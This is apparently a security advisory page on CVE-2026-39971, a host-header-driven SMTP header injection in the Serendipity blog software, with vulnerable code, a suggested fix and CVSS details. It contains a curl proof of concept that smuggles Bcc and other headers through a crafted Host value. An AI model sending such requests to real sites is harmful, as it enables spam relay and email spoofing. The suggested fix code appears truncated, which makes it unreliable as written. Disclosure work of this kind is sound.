Skip to main content

Boteraser | Website and Server Security Solutions

🛡️ CVE-2026-39971 — serendipity

🟠 CVSS 8.0 — High ✅ No Known Exploit CWE-113 NVD
8.0
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

Serendipity has a Host Header Injection allows SMTP header injection via unvalidated HTTP_HOST in Message-ID email header

Summary

Serendipity inserts $_SERVER['HTTP_HOST'] directly into the Message-ID SMTP header without any validation beyond CRLF stripping. An attacker who can control the Host header during an email-triggering action can inject arbitrary SMTP headers into outgoing emails, enabling spam relay, BCC injection, and email spoofing.

Details

In include/functions.inc.php:548:

```php

$maildata['headers'][] = 'Message-ID: <'

. bin2hex(random_bytes(16))

. '@' . $_SERVER['HTTP_HOST'] // ← unsanitized, attacker-controlled

. '>';

```

The existing sanitization function only blocks \r\n and URL-encoded variants:

```php

function serendipity_isResponseClean($d) {

return (strpos($d, "\r") === false && strpos($d, "\n") === false

&& stripos($d, "%0A") === false && stripos($d, "%0D") === false);

}

```

Critically, serendipity_isResponseClean() is not even called on HTTP_HOST before embedding it into the mail headers — making this exploitable with any character that SMTP interprets as a header delimiter.

Email is triggered by actions such as:

  • New comment notifications to blog owner
  • Comment subscription notifications to subscribers
  • Password reset emails (if configured)

PoC

```bash

# Trigger comment notification email with injected header

curl -s -X POST \

-H "Host: attacker.com>\r\nBcc: [email protected]\r\nX-Injected:" \

-d "serendipity[comment]=test&serendipity[name]=hacker&serendipity[email][email protected]&serendipity[entry_id]=1" \

http://[TARGET]/comment.php

```

Resulting malicious Message-ID header in outgoing email:

```

Message-ID: <[email protected]>

Bcc: [email protected]

X-Injected: >

```

Impact

An attacker can control the domain portion of the Message-ID header in all outgoing emails sent by Serendipity (comment notifications, subscriptions).

This enables:

  • Identity spoofing — emails appear to originate from attacker-controlled domain
  • Reply hijacking — some mail clients use Message-ID for threading, pointing replies toward attacker infrastructure
  • Email reputation abuse — attacker's domain embedded in legitimate mail headers

Suggested Fix

Sanitize HTTP_HOST before embedding in mail headers, and restrict to valid hostname characters only:

```php

$safe_host = preg_replace('/[^a-zA-Z0-9.\-]/', '',

parse_url('http://' . $_SERVER['HTTP_HOST'], PHP_URL_HOST)

);

$maildata['headers'][] = 'Message-ID: ';

```

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is low, an attacker needs no privileges on the target. No user interaction is required. The scope is changed, meaning a successful attack can affect components beyond the vulnerable one. Rated impact: confidentiality low, integrity low, availability none.

CVSS metrics in full

The score comes from this vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

  • Attack vector: Network — reachable from anywhere that can route to the service.
  • Attack complexity: Low — the attack works reliably, with no preparation.
  • Privileges required: None — an unauthenticated stranger can try it.
  • User interaction: None — nobody has to be tricked into anything.
  • Scope: Changed — a successful attack reaches components beyond the vulnerable one.
  • Confidentiality impact: Low — limited, and the attacker does not choose what is affected.
  • Integrity impact: Low — limited, and the attacker does not choose what is affected.
  • Availability impact: None.

Weakness class

CVE-2026-39971 is classified as CWE-113: HTTP Response Splitting. Unescaped input reaches an HTTP header, letting an attacker inject line breaks and forge additional headers or responses.

Affected software

CVE-2026-39971 is recorded against 2 packages.

  • s9y/serendipity (fixed in 2.6.0)
  • serendipity

Timeline and source

Published on 14 April 2026 and last revised on 5 May 2026. No public exploit is currently recorded for this entry. A vendor advisory or fix has been published. Record sourced from NVD.

References

github.com (Web)
nvd.nist.gov (Advisory)
github.com (Package)
github.com (Web)

Other advisories for this package

s9y/serendipity has other advisories on record. If you are patching this one, these are worth checking on the same host:

Same weakness in other software

These advisories are the same class of weakness (CWE-113: HTTP Response Splitting) in other software:

Details

Severity HIGH
CVSS Score 8.0
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
CWE CWE-113
Public Exploit ✅ No
Source NVD
Published 2026-04-14
Updated 2026-08-20
Modified 2026-05-05

Affected Packages

Software From version Fixed in
s9y/serendipity 2.6.0
serendipity

Similar Threats

Site Security Check

Is serendipity part of your stack?

CVE-2026-39971 is rated CVSS 8.0 High. BotEraser scans your installation against known CVE records and tells you whether this vulnerability applies to the versions you actually run.

Scan My Site Free →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.

Browse related advisories

All advisoriesCVECVE 2026